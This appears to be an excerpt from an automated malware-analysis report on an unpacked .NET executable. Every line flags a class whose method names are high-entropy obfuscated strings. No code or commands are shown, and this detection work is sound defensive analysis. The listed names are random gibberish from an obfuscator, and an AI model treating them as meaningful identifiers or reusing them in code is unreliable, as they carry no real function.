Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, JGy1kkm7iZhgYKZKSrD.cs	High entropy of concatenated method names: 'jSOOVPBUKq', 'o0Ygei5if8TQd722ggl', 'L105cC5aTAPosVeV9Sj', 'ObfRIT5uI0YMSCkTseF', 'b9JcTP5PJO16TNUiEh1', 'qMguXp5V8LJtZsyapKG', 'QLw', 'YZ8', 'cC5', 'G9C'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, DnjkihvjngbGGxcYTvJ.cs	High entropy of concatenated method names: 'K15EarIX4b', 'QMXE8Rj3c2', 'NteEtnenpJ', 'f77EonHwJL', 'DLhEASgS4C', 'H39bMxNRmgDLOvaj0Hk', 'Ch9gxqNYrcxqY6eV29X', 'nWjrpcNSOvcNaa2h8LE', 'reuUl5NyNTDBVmSfy3c', 'K7jSeHNfX8VHlbhlhxC'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, NwQ8OUmShiwiZJ16CFD.cs	High entropy of concatenated method names: 'Yfu0yCR4Jx', 'KYP0pqy62x', 'GnS094BVqG', 'C57gibgcKZ492NgQIak', 'hvyOfKgTZpJ2gCIAEnr', 'iJv9BLg5KJKOqXGyQ0N', 'YPq8FXggQ0IFCsQnmeT', 'BTg5GagwVm926Z1jrpR', 'QGBpDygU8sxpQSPe0cA', 'bDBEJpg9qAuCCanR2KZ'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, bJEqW1EMsKaCMra046r.cs	High entropy of concatenated method names: 'CwEhgBLU6m', 'SW9hCM94AM', 'RYqhPpAXfE', 'C9Yeju6dUkeETF3YITO', 'glyr4h6x6EiSYrr5oC6', 'MGBorH6Frwu8PpKLSLh', 'tVl7s56Lcx3fvETHjTg', 'l8thiwwWkJ', 'LvOhHjHQqt', 'wdIhLt2kUg'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, Okvp6pvT6y9q4ybfCbt.cs	High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, Ms3BS6mpADeSbyFDsXM.cs	High entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'oCniGY0vrU7Zva4NvMX', 'nfCnLh0IYLwxKmpfjgJ', 'x3yHd108Zy5NJqEkYR6', 'K2RTFl03nFmaxFRRj7w', 'QqdX1I0O6ZMevTNRypL', 'rQbIJp0zUGxiJNKa8Ah'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, eEnE4tOBa2IA5mKoXq.cs	High entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'NxDLcGrd9WylLp1FFmC', 'aelXqArLBI19hyHrVGi', 'KttxIgrmgshMLjUIDEf', 'i7XAnLroKpJklUxXJcZ', 'UYD3nBrAQHuECDWs4XP', 'KUn7ocrG9UKN06tKLq3'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, mFtys2mVUxwug99Go8e.cs	High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'uMOQsXXX0rRgWF006Ut', 'xNTJXyXZAK0FPegoWIy', 'se16MJXTf5m7ZGgKfgi', 'VltXIIX5BkDwWo13D0o', 'E4x7xKXcTQ76fYdWlBV', 'qXLH3QXgcTWvVD8umYf'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, GW15Tc3wtGAdQda7yxr.cs	High entropy of concatenated method names: 'wqwsIxdrkY3S4ifOO6S', 'nZl0Vkdlgd3yNUk3Jul', 'oTNyU9dKs4xu3tvWiPa', 'LVHXcydeyvdkaFGP7ar', 'OSRd8v4uWi', 'WM4', '_499', 'ge5dt4qQU7', 'PeAdooWLZW', 'xG5dAB4MYy'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, e0BFu5EzSf26ua1obyu.cs	High entropy of concatenated method names: 'PtOfnIgKXe', 'edgfxkwewH', 'B5sfTxGdX5', 'pvb5xfixo3D36GevnHJ', 'lr8c0xiFmvgb562kM9G', 'OrLVKuiBYgOptKItHOi', 'afpBQKiHhIxB9oCJXOQ', 'OKBtU0idTBO1l8w56UH', 'gc6hc3iL9ErP9K7hjVB', 'snCtSqimA6sxk8DOqrj'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, rB4B3jUqfhYPWpCiWC.cs	High entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'PnnP7ols1wenCYsCnsm', 'VUOxUtlE62hbNDAWvu6', 'pGMY6Cln1yJaH9ufy98', 'M07aYulYIJ5XT95eLGX', 'prbnu2lShfQafGNbNgl', 'OlsyWFlRvNw65CdqMiW'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, sRLPnWqN19DOKSaBj1.cs	High entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'Kb5lFXrc33oIuTGbxKP', 'qDHS3mrg5SuZJp98gam', 'owA3gmrwy5dnoHQjp4P', 'ijO5VnrU4qRxqQ1Joa4', 'aB5F5kr9IVnIQw00cMj', 'BB1gFJrs9eMNScv9msa'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, SgqDP7yX6NNETIiLJc.cs	High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'TTQry5e2m1yeiJf8b1M', 'mBEW4yekkD0ZYUebY2v', 'GjCNnWepifXpk7fON2W', 'D4yrFkeBCYKR1IjsNK1', 'IZI98UeHH45BdWcq7Od', 'Nf1nvVexwNDRE10AaVv'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, rIGVJApF5OYCU1cbLWF.cs	High entropy of concatenated method names: 'iohm9LBlXN', 'Rkkm7jQyeq', 'G3lmW2aHe1', 'uCnmd9c8LB', 'JZQmn9uUQ0', 'D71mxBU1wI', 'Sd8mTsuJHY', 'YcwmSdU2Dl', 'Et7mmUxeUR', 'aAZmQQ4hHT'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, Kua3lsayv5kqVEF4qqP.cs	High entropy of concatenated method names: '_0023Nn', 'Dispose', 'jBt68dY8QH', 'Q636ti2vqK', 'IKX6oqoLiY', 'JYS6A1NH6y', 'ltI61WyMtR', 'ANTqpEYTSH1VH5FYb43', 'A2oEywY5LZYtxLPn7nt', 'WyDQwRYXRxL2cuHMr80'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, bnV0M5vu8nulrtlwSc4.cs	High entropy of concatenated method names: 'JQl3k2pMOG', 'Cec38hBBMV', 'Tst3taJhqJ', 'rL93oU2vth', 'PZZ3Atq3LN', 'Yth31r347P', 'rYa3c5YY4U', 'lLu3UHZhWD', 'CvX3MHllbb', 'Hnm3Fqju1F'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, Ayt4iraS8YQyjSwJCaX.cs	High entropy of concatenated method names: 'eefH7gZKsm', 'ec5XVnSJJO47akF55c4', 'iQSx9qSAN5XSyYDQ6YN', 'dbp4HVSGYMV4Nu2NdJ9', 'eAOwPkSD7R0Iym5q3Yr', 'okZuc7SMQKnTE9loAtS', 'bbXHRNg8dh', 'pr4HqV4Ju7', 'HnWHKfjtMU', 'A6kHX8SbcS'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, R0c6umm6NDHStqQjMtF.cs	High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'yVnLCkcf4x42CABKswR', 'Bl2qUmc6xd8k5w5vIQZ', 'RVDt1ScuYHEvv31V94k', 'Ns91lPcPxGpwlXLSTDd', 'VbhI3IcivI86R8AwVR4', 'ux3NGDcaHZAmox16eKa'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, deRZfN0Ssn3xLEUpTr7.cs	High entropy of concatenated method names: 'zDF7nPHCYZ', 'nwI7xj4Zwx', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'Spe7TqGLal', '_5f9', 'A6Y'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, GpfYVm0jjHKA1LV3JUk.cs	High entropy of concatenated method names: 'ADF91VyLjg', 'JrE9c0hVNf', 'YpU9UYcZjD', 'CJB9MPsvsk', 'thZ9FuwjAE', 'q4ONX2kCYdOOZKO0k10', 'koytYpkVQwP9xDT1oEa', 'PADHGukNFuy2qjSgeYH', 'Ba5SqRk7W4V6AskUiww', 'Nn4D21kqpvJ4BipUBxo'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, YOYxYWmrnZ8lZkiLxkS.cs	High entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'jxIF5YZWmHWRyNwX4dO', 'itAI5YZ4fpWSn8I1IsC', 'glUtbqZKSU41dulNpT0', 'mJvVhAZeYy3HvbFd8uJ', 'US86GyZrpPDMJX4FW9s', 'wnd6CHZlPdj37T3F1sP'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, K0PNvAEvpGxDpRIUb1r.cs	High entropy of concatenated method names: 'rmqHM0uNAx', 'lc8HFSGUHn', 'idwHB3Emkc', 'KhAHbmDAJ4', 'p7CH27lNPg', 'tgkHYGc6Vl', 'MGOHYUR7co6M5EjSs8k', 'bBTTHXRNG4cQNxmoJwS', 'NRNIKTRCqnjuM8MyP0Y', 'ijYh4KRqF8n2AeLTBhq'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, kX11780203tUMI2q6Qi.cs	High entropy of concatenated method names: 'hxAOHtpliy6o4cGUJ4u', 'XAbTrmp0CDAlWLaIxDp', 'v6Zv9ipelM2OsJXWF05', 'ExqS1GprXu0itBppSMu', 'Q8l6GRpXFuonvklOB4H', 'F7UuXqpZpujI2nd6nmM', 'BSSsogpTVb0nyNOkQaG'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, U7KCETmF5UEfpXml3J8.cs	High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'wCxF8mZoyPTFsOUshp1', 'ketZv3ZAdYIuRJalXxr', 'B5ynDwZGiHli04KKTuV', 'obo4cNZJE4CXcrwKxXt', 'zO0lDZZD9Xcbxcxk1RG', 'd4oPywZMyxL0dBPQXuI'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, gaQ7bd3Bl3HNXgcIkoo.cs	High entropy of concatenated method names: 'oRRWKfyvWq', 'DtQWX8tPp2', 'Y0aWZgDymg', 'EMoWyhV6tL', 'v5YWpqCI0Q', 'DywuowH8pJIFHXJ2bSv', 'rxpZS4H3phVwkc0hGpo', 'k81jhsHO805a9IDuVpU', 'oXCp0VHzWwbH24LhNYX', 'f0GR4axW8N03fqpkMHa'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, Ukdfp6mEXTThN6Z73ti.cs	High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'V31fU60qPjkldWuso2Y', 'Q0tIy20brF3tsYJ5d0C', 'oo25rk0jf0vTrDINPuI', 'F1tmEn0hjWYTpsUs2Jc', 'YLCTEB01TY1ML6BtxXb', 'cvN6t90QIZf42Jupmfq'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, Er44yUvhpjRyICobl6q.cs	High entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'RAmEJuYj0V', '_3il', 'WhoEOSDAtK', 'buYE0sEhha', '_78N', 'z3K'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, dSMHJMmedqgPya91EhH.cs	High entropy of concatenated method names: 'Ark0qS57yR', 'WtLTORg0bguou2dr2xw', 'dkTXvHgXBsA5QpMXpiF', 'rtnKERgrM2U0eb6BAM4', 'OiBhifglBA7XKgrv1SA', 'y9TGJYgZme0luE6Rxcg', '_5q7', 'YZ8', '_6kf', 'G9C'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, lww1AlvbSLZ6IhWPPdt.cs	High entropy of concatenated method names: 'NRjeNcwwZr', 'tGre6vppIy', 'jEpeiZdXet', 'FvxyonVnt0BhLen2M9b', 'kIEhBUVYioVlWTNYr7A', 'zWirFiVsNJyRh7akTff', 'DTU9sVVEZujZbi19FOX', 'X39qcmVSMsaq2T3BDPh', 'nrOTAtVRjeMYd8VnsXe', 'ars2hQVy1ke6AEC9QSn'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, zuQJIov9koRl1N2hNv0.cs	High entropy of concatenated method names: 'EJteanPXNd', 'PUYe8fH2Tg', 'rnQetpOfdi', 'J7seoQ44Nv', 'HAaeADMxNw', 'Sh0kElVQZo0mkwgRndo', 'EFQXgMV2JrGQflK9kSj', 'Q26DEMVhGMb3vPJ5l26', 'jvuEaOV1lxdeXLU7lOI', 'ska4wTVkKS3cqgBWSWj'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, Dig0GbmJeAIUMsYSEXW.cs	High entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'KscDG5XRiTxQDfAqyhh', 'RRcASJXyMmDj3MMTQA0', 'EkMktpXfrEPG7DhZkTf', 'Uu1U1VX6YynHZTnSKWv', 'bergFhXuFTkbBeuTD2l', 'OViEcsXPsWG2407QOJ1'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, CxVrrjvLbDVODG6bSLD.cs	High entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'jf73gMpw3b', 'T1F3CqMM2B', 'r8j', 'LS1', '_55S'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, membF2EqbLXZJg1J9mZ.cs	High entropy of concatenated method names: 'sg9', 'oI7IittU7M', 'iH8hkQnwGE', 'dEhIujJGwg', 'CUxBDOuAwiox11RtoiW', 'MfFCCQuGgPTe1awXlfi', 'XHSkFOuJy5Cej3Q54pl', 'LrKQOIumirQCGJ2gfTR', 'JtHMNluo8gRO2cb6OiN', 'XZDeWsuDTs2waW5CRQU'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, r1bpPaEBkZkHVKY8VZv.cs	High entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'XtsFMbuU0LmMb44Wlq0', 'do48kVu9oFlY7Z11flu', 'IWbEv7usO8VV9diJnDs', 'LFTybOuEgnBtoqdyeqw'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, Na79cOCZaDaboyevNb.cs	High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'tkouMKeI6qZttrCAPfD', 'O0oHcae8IXbV4kBvy32', 'ln9OLMe3MRAJ4sk4fwQ', 'Xa9v5ZeOFFg6Pws45iZ', 'U5wTRfezwGnNiZscuNf', 'GNLbthrWi0l6bafyiXx'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, KkJ2EczcBPoimQWuX3.cs	High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'tj5p3y0eDkjfUbWkqkW', 'tqE1eN0rCarpK0xNHqA', 'TPZVRd0l4xuXMWiwm1n', 'KSPNvs00DkcbkxnQpl7', 'GleXoR0XOc77vrDoSQG', 'ilva7c0ZXJtRLnm1ieO'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, IbiCQ40VEGcbrkY2hWG.cs	High entropy of concatenated method names: 'oca9KRwXOf', 'wfU9Xmc8sO', 'mDyNjI2tvgapvGsTbhS', 'Lskiyf2vJmpG7RIniwx', 'QhJfYO2ItaBMvishTWq', 'TEnIAw28HpZBshReLUL', 'aqLGYX23H7gIAhYO37S', 'WTJO9H2ORJU1nfgR9w6', 'DwQ3lC2zPtOH23kywIJ', 'p4YKXWkW6TUxoltb7yw'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, J7xdp4aV7EccN0InGkm.cs	High entropy of concatenated method names: 'gUtsQgHxll', 'YTksaE2q4F', 'EKAs8dS0E4', 'VSkstQ4982', 'bSEsomIPmu', 'i7YsA1KxdK', 'sMvs1Kxnqd', 'yvpDGjUivFI5SYDLZSl', 'VDyOQoUurNhjmodUBiH', 'jKOtP2UPj5SA4vklf74'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, a42JPjErl8ELVWZIARw.cs	High entropy of concatenated method names: 'OlZLlDqUJ0', 'Vs7LVuicsp', 'mSRLIdlgLk', 'q38L5iXE4U', 'tt5Lv6d0Tf', 'jmphdK60Q94Do3Pp3QT', 'MRJa2M6XABBNjsNPoBV', 'fO3geo6rmSox80ZKUW2', 'YdSTjl6l9rR4PdsFoF2', 'FIRUcm6ZbQ7W8BwjrgH'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, RVhGglIqf2NDvPHTd5.cs	High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'zB7IojK3XWcFDMF6q21', 'rLBZIkKOPuQFqM6AePQ', 'sy5gV6KzcSMpyOQHEcZ', 'vbfECaeWoMlwed9VBTY', 'jby5BJe4DMtfUvKcSy1', 'TS0Xf1eKdpcVHm499wx'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, p6TeQXmB8tsnsueQtcf.cs	High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'o1o1BJZiXQK9V32qJo4', 'jq5WBjZaY3Ja0Bt27WZ', 'qUDjToZVQwN89GEXSRR', 'ofxO7JZN9KM2qcDPp5C', 'z7nqqMZCARpk6wRsmdv', 'foht3eZ7Vv5YaWoqrQ4'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, RmLJck3j9KRACjC6Rqi.cs	High entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, LsXMpD3dOlM7S4SaIDv.cs	High entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'rOYd7Zrid1', 'TVZdWFTuT3', 'SK7ddBGUvE', 'aVCdnoa4oW', 'iyodxDGlGQ', 'KOTdTuPIlu', 'dWw5G1FkG45FUh1uAFU'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, HqXY610ExQLIHsiwVXq.cs	High entropy of concatenated method names: 'mo82fQhujKdyRgx1sXg', 'orDEVwhP0C7Q00q22qk', 'qJJPAVhfxnkpTJ7ojks', 'zYKqZsh6cKS2MA2Ccyr', 'WNlK9QLUJX', 'k24hhyhVGs3d1cj8IlD', 'XRSArUhNhYMRcFGvx93', 'qiOlGehix8ush8cqcJW', 'Mtf2BohaWBUZhsIk9GP', 'BxisOUhCdTChE3CaexS'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, QHu0EWEmYhiHGC6N5Xp.cs	High entropy of concatenated method names: 'ifCHT26Ujn', 'xGOHSua6TO', 'gf2HmFnfvl', 'OqOHQAOVnL', 'OG3fhvSz4aHSpjivgJb', 'pQscJBS3Z3wEVy6UyEm', 'gtvqvHSOXw6aTwibh69', 'tKDPvrRWUa0kAblIK3Z', 'lBeP6HR4hTobUnk9ZWd', 'siOUeyRKEtYe32544CE'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, JFOmJkabBmVCL1854F1.cs	High entropy of concatenated method names: 'AsHsk6HnOl', 'Ubtsw1Ebps', 'mRcDTQ9RPWti13RqPi9', 'KXJcAC9yYLnDV4AWx6C', 'mN1c7f9faZGUnLXZ7yJ', 'iAsujq96ErGVQ8kps9t', 'YhXPLj9uTS9mMUtOYJp', 'gV4Qg49PRxHlEUxMe41', 'k4UDHy9iZsopRFAdO0r', 'nxrtLK9atdkq8uou2bS'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, tAf3NyEeWIJDGB8BkgB.cs	High entropy of concatenated method names: 'RpyyaIikf3YUwPEpeI6', 'tfGsJZipHURL6CWXbYA', 'bnMfhyiQIMiXcyl1GaL', 'YLSmusi2FhpUxoqCSQJ', 'IWF', 'j72', 'BLGfPLseB4', 'eYQfDL74nR', 'j4z', 'hKxfRAXY5S'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, uPWmjypcLYO6A0PHUl.cs	High entropy of concatenated method names: 'yW7EyrMOE', 'tSmKdeh8roJVaqKogL', 'YCRlFPb3yGaKCZQt3A', 'ai0JXqjgs5MJehsS43', 'rOUWTD1ikwVONOq3Qy', 'k4b83PQob21D9jHjQW', 'ekX0QKkHJ', 'MBKsph9Mk', 'JTTNTtnF0', 'qC76oyA9W'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, w9aOoLfbuWO2upGquq.cs	High entropy of concatenated method names: 'NKZ8gur2d', 'HbutAG0S2', 'm98o67OWy', 'sbvmmG4pEeHnNdOxgix', 'A2mbjV42pU3NQL44oWW', 'CG06b14kOl6NFFmELyT', 'AfVoZG4BAPL4mVEsk7B', 'tM7k6F4H35ZXuqSdAOq', 'hN4cIk4xUDTZ6PyPnZl', 'fidnj24FFQsvey14VZY'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, BORYDCpJK4t5Zt3hqX9.cs	High entropy of concatenated method names: 'LqZjVa33Wx3Oi', 'blMsrKms93AWF2KhGx4', 'iLJNqvmEiUCMk23HJkA', 'WDBnlamnlY6YGqkEXaV', 'sTmEuhmYWh9wAmymg2Z', 'kwpk0AmSREV1Ivcm6pb', 'LNctAVmUZlVh8fukTDq', 'BrMoSNm943YNth4gxrj', 'n1NIajmRuti8ZNuXeSK', 'yecmOhmyZUGvAbKIWGs'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, PDiVEtEHQWsQkKG8m0P.cs	High entropy of concatenated method names: '_223', 'PxIFFMfY419eamJjfbo', 'J48SqIfSl4Hor9GZPLB', 'qNoLLdfRiU1OjCG2m6W', 'n5p0rTfyMXoZawygfnt', 'mUNxR6fffp25hRfwxy5', 'YwMPjjf6YHSmWWsCYDD', 'sWuig4fuMfOP2vbGObQ', 'u1ULjOfPQD2C6A7QFff', 'AiariGfiTXH7SnNThQW'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, RdlC1rE6KUgEcJTaZnt.cs	High entropy of concatenated method names: '_9YY', '_57I', 'w51', 'zGJI2DT943', '_168', 'PuU3DGPaQ71GGgLKuyX', 'frHkQWPVnO9qWS0BbPN', 'W2xHSnPN6WaLe4Xgko0', 'kAyGZpPCgU3kWbxAl6G', 'Ug1ol4P7ogR0y2HFnXG'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, sUgx8WanyHy3o2EaZgG.cs	High entropy of concatenated method names: 'SyB078o2Jc', 'G8H0WN6mgX', 'BwG0d3pEss', 'A4ke8Pgh5FAAeDDlf4o', 'B5N6X8g1DcGUKgIvrLv', 'IL6VeWgQV5dFD1mJ68R', 'mefHLGg2GkqUpTZaWmn', 'BUpXU4gkkatENfuxIJA', 'VaKj4xgpcElRjcvn2bm', 'xILW8HgbDevPcobPwPT'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, O1gIK1G4Evm0HgxXi5.cs	High entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'ChdERLKcyK4lnffhU7C', 'PuJYiGKguUprOhc7YD5', 'ClnRIRKwEbedwc4vM8W', 'cNFNmUKU4kRTOFyDLOP', 'eBm0jfK9HuTp8t4G7Ki', 'Ni8ML6Ks0OUEfGKASa0'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, csh3vl6y2ypZcIe7Sq.cs	High entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'Yn6g6Wl0Gpvd8v65sBf', 'CAd2PblXbiDhf1198er', 'yjjLjElZvXKbeD8V5mo', 'htA1V1lTMGme0daSWtV', 'wY6DAyl577m867XCSJI', 'JCGUwrlcYrNp5sRmweC'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, BM3XtammPaNN7JdJhw1.cs	High entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'LMTYYZ0R9cEVF5N40lV', 'D3pWIo0yIBeMen2rOxb', 'uc3UZn0fwGYG6coaZKI', 'JkuZ9k06ics4gbSHJmb', 'gOor4k0use5YJkld4NF', 'fkijQK0POFC4fuZqR7m'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, DeQZ2ImkF0RAFOa5bVx.cs	High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'rDgVMqXBd8IWo0Av3BZ', 'xuqIZgXHkuiy9yjf3an', 'SQX5rFXx2ajqof0KvUm', 'OAfb3vXFToKpAOJ8k7U', 'nKIPyqXdCgCLOKSemu6', 'GfemetXLXZg2Nsyj8IJ'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, ARqgOb3F9alpi2lqNmn.cs	High entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, Q6xeJ6m0ewcFINC5Qn2.cs	High entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'qVTIA20m5wBv80Wg4SJ', 'SVeOtw0oi6gWCFBv0a7', 'uXnV2d0ALN8BlmgYxmf', 'SZy83T0GioFYsTxfiq7', 'vHTtF20JHKxW3svnCsG', 'mU28rC0DYPPvN22hS5L'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, XYW20m3ojs2ePYdAAfH.cs	High entropy of concatenated method names: 'd3CdhDoc79', 'sJxdf9N2Hj', 'TYldrFfReY', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'VtMdjSQPxm'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, mAKywZp8ToODWUb1CfN.cs	High entropy of concatenated method names: 'mZeZg5mV3S9VCPWq7aa', 'tXf2qBmNYCIowlv9qbv', 'o01YB4miZ7OJiDYVE1j', 'Y2ht5nmamkCo9HIBO3y', 'sbQm3XUFrO', 'Y6uhbtmqFjrAIkIK8ex', 'YROi0Rmbe6ZLOVLdGAM', 'VYXkXImjHCCHwkfvaPs', 'HwtZ0nmhgK2xCWdhmj7', 'CCbaCLm1jRSwCBPl4gC'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, e9GKSrmMoN50vAjBiEC.cs	High entropy of concatenated method names: 'nRUOTlZEDn', 'ACPoDpZY6tuovN8vgif', 'nqV77sZSYtpQSqKNH4m', 'ju956TZE7anFjoK7eHd', 'CqSPP6ZnBI0Y258sPw4', 'imSiX7ZRpjtnfPnNHob', 'XhurnWZylVMkveoFUKy', 'AUT445Zf5NH98acCFTs', 'QtVEv0Z6XM2h95mRjIl', 'f28'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, PRSbChaCvQpBAZZX2Zi.cs	High entropy of concatenated method names: 'cSNiLUI6GK', 'sqiihFhQ3s', 'gokQChYvyp7AiKDjcxL', 'xmZNHMYIZdt6b09xguV', 'IXjIoaYM1BsEmTT2dNB', 'Fgl9M6YtFqgnQgRMbh5', 'obiiPfJO9a', 'K92W5gSW0yuq0w3bcQ9', 'UsIvk1S45OA57uwEIiE', 'nmEuXAYOu2IhNThfZjK'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, fNkhdRaK7Plc4Fdyq08.cs	High entropy of concatenated method names: 'DIrNXPPrhv', 'rDtNZ011yp', 'mRdNyGwvKa', 'JwyNpdRW5S', 'G4KN98l1tB', 'EwVDU2EWeKxGXvGFA7f', 'YWQeBKE4m2vTkQXNJnA', 'jqSgF4sO8GoCcbQBuwF', 'xtcYvyszZLK3EgB5xQf', 'QbM9iFEK51rIaUMZP9m'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, C3tSn7T8wPXyTqZ6WE.cs	High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'SYY1HTlt6OjPsF97eEW', 'atf03qlvQEBR88uamU7', 'MRblyElITTF0IlhQReF', 'HWhpg3l8GtqwHAUWO98', 'JTvNY3l3uwHh7LmMsbQ', 'edYTR0lOtdmo4QoendW'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, sNwTqUvVvVg2OqVvYbP.cs	High entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, E3vje90ijLqCKa6XHC5.cs	High entropy of concatenated method names: 'qdw9Yio9CJ', 'UVo9GUHQrC', 'Pel9usucAA', 'NGduWDkHkbNt0XCXgmO', 'yupJRkkpvYUn3AWRt6y', 'QAJNfhkB39MBdjeY2k0', 'AuqMwBkxlhLp8lmJQan', 'JnOlNrkFVcpwYAlFrBI', 'KdxqG8kdYtX3IWD5s5v', 'kVjTlwkLJNd6Fa4IYY8'
